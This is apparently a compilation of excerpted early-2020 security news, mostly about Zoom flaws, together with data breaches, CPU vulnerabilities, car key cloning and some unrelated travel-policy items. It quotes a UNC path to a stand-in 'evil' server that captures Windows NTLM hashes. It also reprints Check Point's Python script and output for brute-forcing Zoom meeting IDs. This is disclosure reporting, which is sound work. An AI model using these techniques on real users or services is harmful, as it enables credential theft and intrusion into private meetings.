Today, news of a Zoom issue affecting Microsoft Windows users. The Zoom Windows client is at risk from a flaw in the chat feature that could allow attackers to steal the logins of people who click on a link, according to tech site Bleeping Computer.

When using Zoom, it’s possible for people to communicate with each other via text message in a chat interface. When a chat message is sent containing a URL, this is converted into a hyperlink that others can click on to open a webpage in their browser.

But the Zoom client apparently also turns Windows networking Universal Naming Convention (UNC) paths into a clickable link in the chat messages, security researcher @_g0dmode has found.

MORE FROM FORBESBeware Zoom Users: Here’s How People Can ‘Zoom-Bomb’ Your ChatBy Kate O’Flaherty

Ok, so what’s the problem?

Bleeping Computer demonstrated how regular URL and the UNC path of \\evil.server.com\images\cat.jpg were both converted into a clickable link in the chat message.

The problem with this is, according to Bleeping Computer: “When a user clicks on a UNC path link, Windows will attempt to connect to a remote site using the SMB file sharing protocol to open the remote cat.jpg file.”

And at the same time, by default, Windows sends a user’s login name and NTLM password hash. This can be cracked fairly easily by an attacker to reveal your password.

Security researcher Matthew Hickey posted an example of exploiting the Zoom Windows client using UNC path injection on Twitter.

Source: Zoom User Warning: This Is How Attackers Could Steal Windows Passwords

Every day, a new Zoom security or privacy issue emerges. At least, that’s the way it seems during the COVID-19 crisis as an increasing number of people use the Zoom video conferencing app while working from home.

Soon after a security problem was disclosed that could allow attackers to steal Windows passwords, another researcher has identified two issues that can be used to take over a Zoom user’s Mac–and the microphone and webcam, according to TechCrunch.

The two bugs found by security researcher Patrick Wardle can be used by a local attacker able to gain physical control of a vulnerable Mac. By exploiting the bugs, the adversary can gain access to your computer and install malware or spyware, he wrote in a blog published today.

The first bug is based on another finding by @c1truz_, technical lead at a U.S. threat detection firm called VMRay. He said earlier this week on Twitter: “Ever wondered how the @zoom_us macOS installer does its job without you ever clicking install? Turns out they (ab)use preinstallation scripts, manually unpack the app using a bundled 7zip and install it to /Applications if the current user is in the admin group (no root needed).”

Source: Zoom Users Beware: Here’s How A Flaw Allows Attackers To Take Over Your Mac Microphone And Webcam

For almost three years, OpenWRT—the open source operating system that powers home routers and other types of embedded systems—has been vulnerable to remote code-execution attacks because updates were delivered over an unencrypted channel and digital signature verifications are easy to bypass, a researcher said.

OpenWRT has a loyal base of users who use the freely available package as an alternative to the firmware that comes installed on their devices. Besides routers, OpenWRT runs on smartphones, pocket computers and even laptops and desktop PCs. Users generally find OpenWRT to be a more secure choice because it offers advanced functions and its source code is easy to audit.

Security researcher Guido Vranken, however, recently found that updates and installation files were delivered over unencrypted HTTPs connections, which are open to attacks that allow adversaries to completely replace legitimate updates with malicious ones. The researcher also found that it was trivial for attackers with moderate experience to bypass digital-signature checks that verify a downloaded update as the legitimate one offered by OpenWTR maintainers. The combination of those two lapses makes it possible to send a malicious update that vulnerable devices will automatically install.

Exploits not for everyone

These code-execution exploits are limited in their scope because adversaries must either be in a position to conduct a man-in-the-middle attack or tamper with the DNS server that a device uses to find the update on the Internet. That means routers on a network that has no malicious users and using a legitimate DNS server are safe from attack. Vranken also speculates that packet spoofing or ARP cache poisoning may also make attacks possible, but he cautions that he didn’t test either method.

Source: OpenWRT code-execution bug puts millions of devices at risk | Ars Technica

Popular video-conferencing Zoom is leaking personal information of at least thousands of users, including their email address and photo, and giving strangers the ability to attempt to start a video call with them through Zoom.

The issue lies in Zoom’s “Company Directory” setting, which automatically adds other people to a user’s lists of contacts if they signed up with an email address that shares the same domain. This can make it easier to find a specific colleague to call when the domain belongs to an individual company. But multiple Zoom users say they signed up with personal email addresses, and Zoom pooled them together with thousands of other people as if they all worked for the same company, exposing their personal information to one another.

“I was shocked by this! I subscribed (with an alias, fortunately) and I saw 995 people unknown to me with their names, images and mail addresses.” Barend Gehrels, a Zoom user impacted by the issue and who flagged it to Motherboard, wrote in an email.

Gehrels provided a redacted screenshot of him logged into Zoom with the nearly 1000 different accounts listed in the “Company Directory” section. He said these were “all people I don’t know of course.” He said his partner had the same issue with another email provider, and had over 300 people listed in her own contacts.

“If you subscribe to Zoom with a non-standard provider (I mean, not Gmail or Hotmail or Yahoo etc), then you get insight to ALL subscribed users of that provider: their full names, their mail addresses, their profile picture (if they have any) and their status. And you can video call them,” Gehrels said. A user still has to accept the call from the stranger for it to start, however.

A redacted screenshot of the Company Directory issue provided by Gehrels. Image: Motherboard

On its website, Zoom says, “By default, your Zoom contacts directory contains internal users in the same organization, who are either on the same account or who’s email address uses the same domain as yours (except for publicly used domains including gmail.com, yahoo.com, hotmail.com, etc) in the Company Directory section.”

Zoom’s system does not exempt all domains that are used for personal email, however. Gehrels said he encountered the issue with the domains xs4all.nl, dds.nl, and quicknet.nl. These are all Dutch internet service providers (ISPs) which offer email services.

On Twitter Motherboard found other instances of Dutch users reporting the same issue.

“I just had a look at the free for private use version of Zoom and registered with my private email. I now got 1000 names, email addresses and even pictures of people in the company Directory. Is this intentional?,” one user tweeted last week along with a screenshot.

Dutch ISP XS4ALL tweeted in response to a complaint on Sunday, “This is something we cannot disable. You could see if Zoom can help you with this.”

Do you know anything about data selling or trading? We’d love to hear from you. Using a non-work phone or computer, you can contact Joseph Cox securely on Signal on +44 20 8133 5190, Wickr on josephcox, OTR chat on jfcox@jabber.ccc.de, or email joseph.cox@vice.com.

Dutch ISP DDS told Motherboard in an email it was aware of the issue, but hadn’t heard directly from any of their own customers about it.

“Zoom maintains a blacklist of domains and regularly proactively identifies domains to be added,” a Zoom spokesperson told Motherboard. “With regards to the specific domains that you highlighted in your note, those are now blacklisted.” They also pointed to a section of the Zoom website where users can request other domains to be removed from the Company Directory feature.

Source: Zoom is Leaking Peoples’ Email Addresses and Photos to Strangers – VICE

In this publication we describe a technique which would have allowed a threat actor to potentially identify and join active meetings.

All the details discussed in this publication were responsibly disclosed to Zoom Video Communications, Inc. In response, Zoom introduced a number of mitigations, so this attack is no longer possible.

The Problem

If you use Zoom, you may already know that Zoom Meeting IDs are composed of 9, 10 or 11 digits. The problem was that if you hadn’t enabled the “Require meeting password” option or enabled Waiting Room, which allows manual participants admission, these 9-10-11 digits were the only thing that secured your meeting i.e. prevented an unauthorized person from connecting to it.

Let Me Guess…
The first thing we did was pre-generate the list of potentially valid Zoom Meeting IDs. We took 1000 “random” Meeting IDs and prepared the URL string for joining the meeting here as well:

urls = []
for _ in range(1000):
urls.append("https://zoom.us/j/{}".format(randint(100000000, 9999999999)))

But how could we determine if a Zoom Meeting ID represented a valid meeting or not? We discovered a fast and easy way to check this based on the following “div” element present in the HTML Body of the returned response, when accessing “Join Meeting” URL (https://zoom.us/j/{MEETING_ID})

<div id="join-errormsg" class="error"><i></i><span>Invalid meeting ID.</span></div&gt

I Found It!
We then tried to automate the described approach (just in case you don’t want to brute force all the Meeting IDs by hand):

for url in urls:
    yield MakeHTTPRequest(url=url, callback=parseResponse)

def MakeHTTPRequest(url, callback)
    …

def parseResponse(response):
    if response.css('div#join-errormsg').get() is None:
        print('Valid Meeting ID found: {}'.format(response.url))
    else:
        print('Invalid Meeting ID')

…and look at the output:

Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/22XXX41X8
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/8XXX34XXX9
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/93XXX9XXX5
Invalid Meeting ID
Invalid Meeting ID

Bingo!

Results
We were able to predict ~4% of randomly generated Meeting IDs, which is a very high chance of success, comparing to the pure brute force.

Mitigation

We contacted Zoom on July 22, 2019 as part of a responsible disclosure process and proposed the following mitigations:
1. Re-implement the generation algorithm of Meeting IDs
2. Replace the randomization function with a cryptographically strong one.
3.Increase the number of digits\symbols in the Meeting IDs.
4.Force hosts to use passwords\PINs\SSO for authorization purposes.

Zoom representatives were very collaborative and responded quickly to our emails. Here is the list of changes that were introduced to the Zoom client\infrastructure following our disclosure:

1. Passwords are added by default to all future scheduled meetings.
2. Users can able to add a password to already-scheduled future meetings and received instructions by email on how to do so. See article for instructions: https://support.zoom.us/hc/en-us/articles/360033331271-Account-Setting-Update-Password-Default-for-Meeting-and-Webinar
3. Password settings are enforceable at the account level and group level by the account admin.
4. Zoom will no longer automatically indicate if a meeting ID is valid or invalid. For each attempt, the page will load and attempt to join the meeting. Thus, a bad actor will not be able to quickly narrow the pool of meetings to attempt to join.
5. Repeated attempts to scan for meeting IDs will cause a device to be blocked for a period of time.

Source: Zoom-Zoom: We Are Watching You – Check Point Research

The FBI has issued a warning about video messaging service Zoom, and New York Attorney General’s office has made an inquiry into its cybersecurity practices, after a string of disturbing incidents involving takeovers of teleconferences.

Per Agence France-Presse, malicious individuals have been taking advantage of lax security and the surge in teleconferencing during the coronavirus pandemic to pull off a trick called “Zoombombing,” in which they can join any public meeting and use the app’s screen-sharing mode to broadcast whatever they want. All Zoom meetings are public by default, and as the Verge noted, the settings to restrict screen sharing to the host of a meeting (or turn it off after a meeting starts) are hidden under menus. This means that anyone who forgets to tweak these settings, which appears to be an awful lot of people, is vulnerable to Zoombombing.

Trolls have eagerly taken the opportunity to hijack Zoom meetings and broadcast pornography, slurs, and Nazi imagery to everything from religious institutions and corporate meetings to classrooms at schools. In one incident, someone took over a Chipotle meeting on Zoom featuring musician Lauv and promptly flooded it with hardcore porn. Zoom, which has experienced an explosion in downloads during the ongoing period of social distancing, has seemed caught off guard.

On Monday, the FBI’s Boston office issued a warning that it “has received multiple reports of conferences being disrupted by pornographic and/or hate images and threatening language. As individuals continue the transition to online lessons and meetings, the FBI recommends exercising due diligence and caution in your cybersecurity efforts.” In the warning, it noted one Massachusetts incident in which an individual joined an online high school classroom hosted on Zoom to yell profanities and reveal the teacher’s home address. Another school reported an incident to the FBI in which a man with “swastika tattoos” joined a meeting; the FBI told anyone who has had a Zoom call hijacked to contact its Internet Crime Complaint Center.

A spokesperson for the NY Attorney General’s office told AFP that they had sent a letter to Zoom “with a number of questions to ensure the company is taking appropriate steps to ensure users’ privacy and security.” The spokesperson added that they were “trying to work with the company” to prevent future incidents.

This isn’t the first time Zoom has come under scrutiny. On Tuesday, a report in the Intercept found that the service guarantees of end-to-end encryption for video meetings without a mobile device, but it actually uses transport encryption, allowing Zoom developers to access unencrypted audio and video content of meetings. (The Intercept noted that unlike Google, Facebook, and Microsoft, Zoom does not publish transparency reports on how many law enforcement requests for data it receives or how many it complies with.)

Zoom also recently pushed an update to nix code that sent analytics data to Facebook’s Graph API (even when Zoom users didn’t have an account on the social network) under a privacy policy that didn’t make the extent of the sharing clear. That is current the subject of a class action lawsuit, though whether or not the suit is viable is another question. Zoom also eventually caved last year and patched a “click-to-join” feature that installed insecure local web servers on Mac machines that weren’t deleted when the app was removed, allowing remote access to the webcams of any Mac that had current or previous installations of Zoom. The company had initially defended it as a convenience feature.

“We work 24 hours a day to ensure that hospitals, universities, schools and other companies can be connected and operational,” a Zoom spokesperson told AFP. “We appreciate the interest of the New York prosecutor in these matters and are happy to deliver the requested information.”

Source: FBI Issues Warning, NY Attorney General Makes Inquiry After Wave of Zoom Hijackings

Zoom, the video conferencing service whose use has spiked amid the Covid-19 pandemic, claims to implement end-to-end encryption, widely understood as the most private form of internet communication, protecting conversations from all outside parties. In fact, Zoom is using its own definition of the term, one that lets Zoom itself access unencrypted video and audio from meetings.

With millions of people around the world working from home in order to slow the spread of the coronavirus, business is booming for Zoom, bringing more attention on the company and its privacy practices, including a policy, later updated, that seemed to give the company permission to mine messages and files shared during meetings for the purpose of ad targeting.

Still, Zoom offers reliability, ease of use, and at least one very important security assurance: As long as you make sure everyone in a Zoom meeting connects using “computer audio” instead of calling in on a phone, the meeting is secured with end-to-end encryption, at least according to Zoom’s website, its security white paper, and the user interface within the app. But despite this misleading marketing, the service actually does not support end-to-end encryption for video and audio content, at least as the term is commonly understood. Instead it offers what is usually called transport encryption, explained further below.

When mousing over the green lock in the top left of the Zoom desktop app, it says, “Zoom is using an end to end encrypted connection”

Screenshot: The Intercept

In Zoom’s white paper, there is a list of “pre-meeting security capabilities” that are available to the meeting host that starts with “Enable an end-to-end (E2E) encrypted meeting.” Later in the white paper, it lists “Secure a meeting with E2E encryption” as an “in-meeting security capability” that’s available to meeting hosts. When a host starts a meeting with the “Require Encryption for 3rd Party Endpoints” setting enabled, participants see a green padlock that says, “Zoom is using an end to end encrypted connection” when they mouse over it.

But when reached for comment about whether video meetings are actually end-to-end encrypted, a Zoom spokesperson wrote, “Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection.”

The encryption that Zoom uses to protect meetings is TLS, the same technology that web servers use to secure HTTPS websites. This means that the connection between the Zoom app running on a user’s computer or phone and Zoom’s server is encrypted in the same way the connection between your web browser and this article (on https://theintercept.com) is encrypted. This is known as transport encryption, which is different from end-to-end encryption because the Zoom service itself can access the unencrypted video and audio content of Zoom meetings. So when you have a Zoom meeting, the video and audio content will stay private from anyone spying on your Wi-Fi, but it won’t stay private from the company. (In a statement, Zoom said it does not directly access, mine, or sell user data; more below.)

Source: Zoom Meetings Do Not Support End-to-End Encryption

Oh dear.

Hackers have slurped biz comms customers’ data from a database run by one of O2’s largest UK partners.

In an email sent to its customers, the partner, Aerial Direct, said that an unauthorised third party had been able to access customer data on 26 February through an external backup database, which included personal information on both current and expired subscribers from the last six years.

The data accessed included personal information, such as names, dates of birth, business addresses, email address, phone numbers, and product information. The company said no passwords or financial information was taken.

“As soon as we became aware of this unauthorised access we shut down access to the system and launched a full investigation, with assistance from experts, to determine what happened and what information was affected. We immediately reported this matter to the Information Commissioner’s Office and are actively working on fully exploring the details of how it happened.”

Source: Your data was ‘taken without permission’, customers told, after personal info accessed in O2 UK partner’s database • The Register

Earlier this month, the multibillion-dollar cruise conglomerate Carnival Corp. announced that two of its most popular lines—Holland America and Princess Cruises—were respectively slammed with hacks compromising the sensitive personal intel of cruise-goers and cruise-workers alike. Even though neither announcement makes mention of when each respective breach was disclosed, pulling up the source code for the Princess line’s disclosure reveals that the post happened midday on March 2—just as the U.S. began to learn of the country’s first deaths from covid-19—which is probably why the breach news slipped past most of our radars.

Per Carnival, its cruise companies were hit sometime between April and July of last year, when “an unsanctioned third party gained unauthorized access to some employee email accounts that contained personal information regarding our employees, crew, and guests.”

What kind of information did the “unsanctioned third party” access? All the bad types. Carnival offers a brief rundown:

The types of data potentially impacted varies by individual but can include: name, address, Social Security number, government identification number, such as passport number or driver’s license number, credit card and financial account information, and health-related information.

While neither cruise line has released any hard evidence of any of these details being misused (yet), Holland America’s notice makes sure to mention that guests should consider contacting the major credit bureaus in their respective countries to put fraud alerts on their credit reports. The line also offered to set people up with free credit monitoring and identity protection services to give their guests some “peace of mind.”

Source: Carnival Corp. Discloses Data Breach Amid Covid-19 Panic

Whisper, the secret-sharing app that called itself the “safest place on the Internet,” left years of users’ most intimate confessions exposed on the Web tied to their age, location and other details, raising alarm among cybersecurity researchers that users could have been unmasked or blackmailed.

The data exposure, discovered by independent researchers and shown to The Washington Post, allowed anyone to access all of the location data and other information tied to anonymous “whispers” posted to the popular social app, which has claimed hundreds of millions of users. The records were viewable on a non-password-protected database open to the public Web. A Post reporter was able to freely browse and search through the records, many of which involved children: A search of users who had listed their age as 15 returned 1.3 million results.

The cybersecurity consultants Matthew Porter and Dan Ehrlich, who lead the advisory group Twelve Security, said they were able to access nearly 900 million user records from the app’s release in 2012 to the present day. The researchers alerted federal law-enforcement officials and the company to the exposure.

Shortly after researchers and The Post contacted the company on Monday, access to the data was removed.

Source: 900 Million Secrets From 8 Years of ‘Whisper’ App Were Left Exposed Online – Slashdot

Federal regulators waived a rule Wednesday that was causing airlines to fly nearly empty planes just to avoid losing takeoff and landing rights at major airports.

The Federal Aviation Administration said it would suspend the rule through May 31 to help airlines that are canceling flights because of the new virus outbreak.

The FAA assigns takeoff and landing rights, or “slots,” at a few big, congested airports. Airlines must use 80% of their highly coveted slots or risk forfeiting them.

That FAA requirement — and especially a similar rule in Europe — led airlines to operate flights using those slots even if there were very few passengers.

The FAA’s decision affects flights at John F. Kennedy and LaGuardia airports in New York and Reagan Washington National Airport outside Washington, D.C.

The FAA said it also would not punish airlines that cancel flights through May 31 at four other airports where the agency approves schedules: Chicago’s O’Hare International Airport, Newark Liberty International Airport in New Jersey; Los Angeles International Airport and San Francisco International Airport.

The FAA waiver covers U.S. and foreign airlines. The agency’s announcement came a day after the European Commission promised to move quickly to waive its similar rule.

It could take weeks or even months for the European Commission to adopt the proposal, but it is likely to have immediate effect. It is a signal to airlines that they can stop flying mostly empty planes and still be confident that the emergency rules change will be approved before airport slots are allotted again.

Source: Rule Waiver Will Reduce Empty Planes During Virus Outbreak | Time

Donald Trump has suspended all travel to the US from Europe for 30 days to try and tackle the coronavirus crisis.

The draconian measures come into effect from midnight Friday, but do not apply to the United Kingdom. Trump revealed his plans in a rare Oval Office address on Wednesday night while criticizing the European Union for allowing the virus to take hold.

He said: ‘The European Union failed to take the same precautions (as the US) and restrict travel from China and other hotspots. As a result, a large number of new clusters in the United States were seeded by travelers from Europe.

‘After consulting with our top government health officials I have decided to take several strong but necessary actions to protect the health of all Americans. To stop new cases from entering our shores we will be suspending all travel from Europe to our shores for 30 days.’

Source: Donald Trump bans all travel from Europe to US for 30 days to stop coronavirus

Named Load Value Injection, or LVI for short, this is a new class of theoretical attacks against Intel CPUs.

While the attack has been deemed only a theoretical threat, Intel has released firmware patches to mitigate attacks against current CPUs, and fixes will be deployed at the hardware (silicon design) level in future generations.

A reverse Meltdown attack

To understand what an LVI attack is, users must first be aware of the Meltdown and Spectre attacks, and more particularly Meltdown.

Disclosed in January 2018, the Meltdown attack allowed an attacker running code on a CPU to read data from the CPU’s memory, while the CPU was processing “speculative” operations.

Speculative execution is a feature of all modern CPUs, one in which the CPU computes information in advance in an attempt to guess future results. The entire idea of speculative execution is to have the data ready for the CPU, if it ever needs it, and help improve the CPU’s speed and performance. Once data is not needed, it’s discarded. Meltdown and Spectre attacks target data while in this “transient” state, while waiting to be dismissed.

The Meltdown and Spectre attacks were groundbreaking when they were first revealed in 2018, showing a major flaw in the designs of modern CPUs.

Based on the original attacks, academics around the world later expanded the original research and discovered an entire class of so-called “transient attacks” that also leaked data from CPUs in their “transient” speculative execution states.

Besides Meltdown and Spectre, other transient attacks were eventually discovered during the past two years, including the likes of Foreshadow, Zombieload, RIDL, Fallout, and LazyFP.

LVI’s position in all these attacks is, technically, of a reverse-Meltdown. While the original Meltdown bug allowed attackers to read an app’s data from inside a CPU’s memory while in a transient state, LVI allows the attacker to inject code inside the CPU and have it executed as a transient “temporary” operation, giving attackers more control over what happens.

Tests performed by the two research teams — who found the LVI attack independently from one another — have been successful at proving the attack’s broad impact.

[…]

Current LVI attack demos rely on running malicious code on a computer, suggesting that local access is needed — such as delivering malicious code to the target via malware.

However, a remote attack is also possible via JavaScript, by tricking users into accessing a malicious site — similar to the original Meltdown attack, which could also be carried out via JavaScript.

[…]

While a change in the silicon design will eventually come with future CPUs, currently, Intel has prepared software-based mitigations, in the form of CPU firmware (microcode) updates.

However, according to preliminary tests, these mitigations come with a severe performance impacted that may slow down computations from 2 to 19 times, depending on the number of mitigations system administrators decide to apply to their CPUs.

Currently, many administrators are expected to skip these patches, primarily because of the severe performance impact.

Source: Intel CPUs vulnerable to new LVI attacks | ZDNet

Web researcher David Eade found and reported CVE-2020-8987 to Avast: this is a trio of blunders that, when combined, can be exploited by a snooper to silently intercept and tamper with an AntiTrack user’s connections to even the most heavily secured websites.

This is because when using AntiTrack, your web connections are routed through the proxy software so that it can strip out tracking cookies and similar stuff, enhancing your privacy. However, when AntiTack connects to websites on your behalf, it does not verify it’s actually talking to the legit sites. Thus, a miscreant-in-the-middle, between AntiTrack and the website you wish to visit, can redirect your webpage requests to a malicious server that masquerades as the real deal, and harvest your logins or otherwise snoop on you, and you’d never know.

The flaws affect both the Avast and AVG versions of AntiTrack, and punters are advised to update their software as a fix for both tools has been released.

Eade has been tracking the bug since August last year.

“The consequences are hard to overstate. A remote attacker running a malicious proxy could capture their victim’s HTTPS traffic and record credentials for later re-use,” he said. “If a site needs two factor authentication (such as a one-time password), then the attacker can still hijack a live session by cloning session cookies after the victim logs in.”

Source: Avast’s AntiTrack promised to protect your privacy. Instead, it opened you to miscreant-in-the-middle snooping • The Register

In fact, the marketing database also contained some subscribers’ requests to block or unblock access to X-rated and gambling websites, unique ID numbers of stolen cellphones, and records of whichever site they were visiting before arriving at the Virgin Media website.

This is according to British infosec shop Turgensec, which discovered the poorly secured Virgin Media info silo and privately reported it to the broadband-and-TV-and-phone provider. The research team today said the extent of the data spill was more extensive, and personal, than Virgin Media’s official disclosure seemed to suggest.

Here, in full, is what Turgensec said it found in the data cache that was exposed from mid-April to this month:

* Full names, addresses, date of birth, phone numbers, alternative contact phone numbers and IP addresses – corresponding to both customers and “friends” referred to the service by customers.

* Requests to block or unblock various pornographic, gore related and gambling websites, corresponding to full names and addresses. IMEI numbers associated with stolen phones.

* Subscriptions to the different aspects of their services, including premium components.

* The device type owned by the user, where relevant.

* The “Referrer” header taken seemingly from a users browser, containing what would appear to be the previous website that the user visited before accessing Virgin Media.

* Form submissions by users from their website.

Those website block and unblock requests were a result of Britain’s ruling class pressuring ISPs to implement filters to prevent kids viewing adult-only material via their parents’ home internet connections. The filters were also supposed to stop Brits from seeing any particularly nasty unlawful content.

Virgin Media today stressed the database held about a thousand subscribers’ filter request inquiries.

Source: FYI: When Virgin Media said it leaked ‘limited contact info’, it meant p0rno filter requests, IP addresses, IMEIs as well as names, addresses and more • The Register

Over the past few years, owners of cars with keyless start systems have learned to worry about so-called relay attacks, in which hackers exploit radio-enabled keys to steal vehicles without leaving a trace. Now it turns out that many millions of other cars that use chip-enabled mechanical keys are also vulnerable to high-tech theft. A few cryptographic flaws combined with a little old-fashioned hot-wiring—or even a well-placed screwdriver—lets hackers clone those keys and drive away in seconds.

Researchers from KU Leuven in Belgium and the University of Birmingham in the UK earlier this week revealed new vulnerabilities they found in the encryption systems used by immobilizers, the radio-enabled devices inside of cars that communicate at close range with a key fob to unlock the car’s ignition and allow it to start. Specifically, they found problems in how Toyota, Hyundai, and Kia implement a Texas Instruments encryption system called DST80. A hacker who swipes a relatively inexpensive Proxmark RFID reader/transmitter device near the key fob of any car with DST80 inside can gain enough information to derive its secret cryptographic value. That, in turn, would allow the attacker to use the same Proxmark device to impersonate the key inside the car, disabling the immobilizer and letting them start the engine.

The researchers say the affected car models include the Toyota Camry, Corolla, and RAV4; the Kia Optima, Soul, and Rio; and the Hyundai I10, I20, and I40. The full list of vehicles that the researchers found to have the cryptographic flaws in their immobilizers is below:

Though the list also includes the Tesla S, the researchers reported the DST80 vulnerability to Tesla last year, and the company pushed out a firmware update that blocked the attack.

Toyota has confirmed that the cryptographic vulnerabilities the researchers found are real. But their technique likely isn’t as easy to pull off as the “relay” attacks that thieves have repeatedly used to steal luxury cars and SUVs. Those generally require only a pair of radio devices to extend the range of a key fob to open and start a victim’s car. You can pull them off from a fair distance, even through the walls of a building.

Source: Hackers Can Clone Millions of Toyota, Hyundai, and Kia Keys | WIRED

Based on Google data, two in five of Android users worldwide may no longer be receiving updates, and while these devices won’t immediately have problems, without security support there is an increased risk to the user.

Our latest tests have shown how such phones and tablets, including handsets still available to buy from online marketplaces such as Amazon, could be affected by a range of malware and other threats. This could result in personal data being stolen, getting spammed by ads or even signed up to a premium rate phone service.

[…]

Generally speaking, the older the phone, the greater the risk. With the Android versions released in the past five years (Android 5.0 to 10.0), Google put more effort into enhancing security and privacy to give the user greater protection, transparency and control over their data. But smartphones can still be an attractive target, and it’s important to be aware of the threat.

Based on Google’s own data from May 2019, 42.1% of Android active users worldwide are on version 6.0 or earlier: Marshmallow (2015), Lollipop (2014), KitKat (2013), Jellybean (2012), Ice Cream Sandwich (2011) and Gingerbread (2010).

According to the Android Security Bulletin, there were no security patches issued for the Android system in 2019 that targeted Android versions below 7.0 Nougat.

That means more than one billion phones and tablets may be active around the world that are no longer receiving security updates.

[…]

We tasked expert antivirus lab, AV Comparatives, to try to infect them with malware, and it managed it on every phone, including multiple infections on some.

As you can see in the above chart, all the Android phones we used in our test lacked the more modern security features introduced by Google to the latest Android 9.0 or 10.

Source: More than one billion Android devices at risk of malware threats – Which? News

Virgin Media, one of the UK’s biggest ISPs, on Thursday admitted it accidentally spilled 900,000 of its subscribers’ personal information onto the internet via a poorly secured database.

The cableco said it “incorrectly configured” a storage system so that at least one miscreant was able to access it and potentially siphon off customer records. The now-secured marketing database – containing names, home and email addresses, and phone numbers, and some dates of birth, plus other info – had been left open since mid-April 2019.

Crucially, the information “was accessed on at least one occasion but we do not know the extent of the access,” Virgin Media’s CEO Lutz Schüler said in a statement this evening. Said access, we speculate, could have been from an automated bot scanning the internet, or someone prowling around looking for open gear; at this stage, we don’t know.

In a separate email to subscribers, shared with El Reg by dozens of readers, the telco expanded: “The database was used to manage information about our existing and potential customers in relation to some of our marketing activities. This included: contact details (such as name, home and email address and phone numbers), technical and product information, including any requests you may have made to us using forms on our website. In a very small number of cases, it included date of birth.”

The storage box, we understand, not only contained Virgin Media broadband and fixed-line subscriber records – some 15 per cent of that total customer base – but also info on some cellular users. If a punter referred a friend to Virgin Media, that pal’s details may be in the silo, too.

Source: Like a Virgin, hacked for the very first time… UK broadband ISP spills 900,000 punters’ records into wrong hands from insecure database • The Register

Microsoft reckons 0.5 per cent of Azure Active Directory accounts as used by Office 365 are compromised every month.

The Window giant’s director of identity security, Alex Weinert, and IT identity and access program manager Lee Walker revealed the figures at the RSA conference last month in San Francisco.

“About a half of a per cent of the enterprise accounts on our system will be compromised every month, which is a really high number. If you have an organisation of 10,000 users, 50 will be compromised each month,” said Weinert.

It is an astonishing and disturbing figure. Account compromise means that a malicious actor or script has some access to internal resources, though the degree of compromise is not stated. The goal could be as simple as sending out spam or, more seriously, stealing secrets and trying to escalate access.

Password spray attacks account for 40% of compromised accounts

How do these attacks happen? About 40 per cent are what Microsoft calls password spray attacks. Attackers use a database of usernames and try logging in with statistically probable passwords, such as “123” or “p@ssw0rd”. Most fail but some succeed. A further 40 per cent are password replay attacks, where attackers mine data breaches on the assumption that many people reuse passwords and enterprise passwords in non-enterprise environments. That leaves 20 per cent for other kinds of attacks like phishing.

The key point, though, is that if an account is compromised, said Weinert, “there’s a 99.9 per cent chance that it did not have MFA [Multi Factor Authentication]”. MFA is where at least one additional identifier is required when logging in, such as a code on an authenticator application or a text message to a mobile phone. It is also possible (and preferable) to use FIDO2 security keys, a feature now in preview for Azure AD. Even just disabling legacy authentication helps, with a 67 per cent reduction in the likelihood of compromise.

Source: Enable that MF-ing MFA: 1.2 million Azure Active Directory accounts compromised every month, reckons Microsoft • The Register

An error in chipset read-only memory (ROM) could allow attackers to compromise platform encryption keys and steal sensitive information.

Intel has thanked Positive Technologies experts for their discovery of a vulnerability in Intel CSME. Most Intel chipsets released in the last five years contain the vulnerability in question.

By exploiting vulnerability CVE-2019-0090, a local attacker could extract the chipset key stored on the PCH microchip and obtain access to data encrypted with the key. Worse still, it is impossible to detect such a key breach. With the chipset key, attackers can decrypt data stored on a target computer and even forge its Enhanced Privacy ID (EPID) attestation, or in other words, pass off an attacker computer as the victim’s computer. EPID is used in DRM, financial transactions, and attestation of IoT devices.

One of the researchers, Mark Ermolov, Lead Specialist of OS and Hardware Security at Positive Technologies, explained: “The vulnerability resembles an error recently identified in the BootROM of Apple mobile platforms, but affects only Intel systems. Both vulnerabilities allow extracting users’ encrypted data. Here, attackers can obtain the key in many different ways. For example, they can extract it from a lost or stolen laptop in order to decrypt confidential data. Unscrupulous suppliers, contractors, or even employees with physical access to the computer can get hold of the key. In some cases, attackers can intercept the key remotely, provided they have gained local access to a target PC as part of a multistage attack, or if the manufacturer allows remote firmware updates of internal devices, such as Intel Integrated Sensor Hub.”

The vulnerability potentially allows compromising common data protection technologies that rely on hardware keys for encryption, such as DRM, firmware TPM, and Intel Identity Protection. For example, attackers can exploit the vulnerability on their own computers to bypass content DRM and make illegal copies. In ROM, this vulnerability also allows for arbitrary code execution at the zero level of privilege of Intel CSME. No firmware updates can fix the vulnerability.

Intel recommends that users of Intel CSME, Intel SPS, Intel TXE, Intel DAL, and Intel AMT contact their device or motherboard manufacturer for microchip or BIOS updates to address the vulnerability. Check the Intel website for the latest recommendations on mitigation of vulnerability CVE-2019-0090.

Since it is impossible to fully fix the vulnerability by modifying the chipset ROM, Positive Technologies experts recommend disabling Intel CSME based encryption of data storage devices or considering migration to tenth-generation or later Intel CPUs. In this context, retrospective detection of infrastructure compromise with the help of traffic analysis systems such as PT Network Attack Discovery becomes just as important.

Source: Positive Technologies: Unfixable vulnerability in Intel chipsets threatens users and content rightsholders

The European Commission has told its staff to start using Signal, an end-to-end-encrypted messaging app, in a push to increase the security of its communications.

The instruction appeared on internal messaging boards in early February, notifying employees that “Signal has been selected as the recommended application for public instant messaging.”

The app is favored by privacy activists because of its end-to-end encryption and open-source technology.

“It’s like Facebook’s WhatsApp and Apple’s iMessage but it’s based on an encryption protocol that’s very innovative,” said Bart Preneel, cryptography expert at the University of Leuven. “Because it’s open-source, you can check what’s happening under the hood,” he added.

[…]

Privacy experts consider that Signal’s security is superior to other apps’. “We can’t read your messages or see your calls,” its website reads, “and no one else can either.”

[…]

The use of Signal was mainly recommended for communications between staff and people outside the institution. The move to use the application shows that the Commission is working on improving its security policies.

